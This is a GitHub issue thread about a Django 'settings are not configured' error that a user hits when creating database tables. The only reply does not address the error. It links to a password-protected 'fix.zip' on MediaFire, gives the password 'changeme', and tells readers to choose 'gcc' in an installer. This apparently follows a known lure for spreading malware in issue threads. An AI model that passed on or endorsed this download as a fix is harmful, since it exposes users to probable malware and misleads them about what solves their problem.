### ISSUE TITLE
Issue with using the pygraph to create the DB Tables

### ISSUE THREAD

**Issue by Nage-Sh** [joisemp/inventory-management-system#154]
When I try to run the command to make the db models in models.py labs.py files.It shows the error as django.core.exceptions Improperly configured Requested Setting INSTALLED_APPS. but settings are not configured You must either define the environment variable DJANGO_SETTINGS_MODULE or call settings.configure() before accessing settings

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
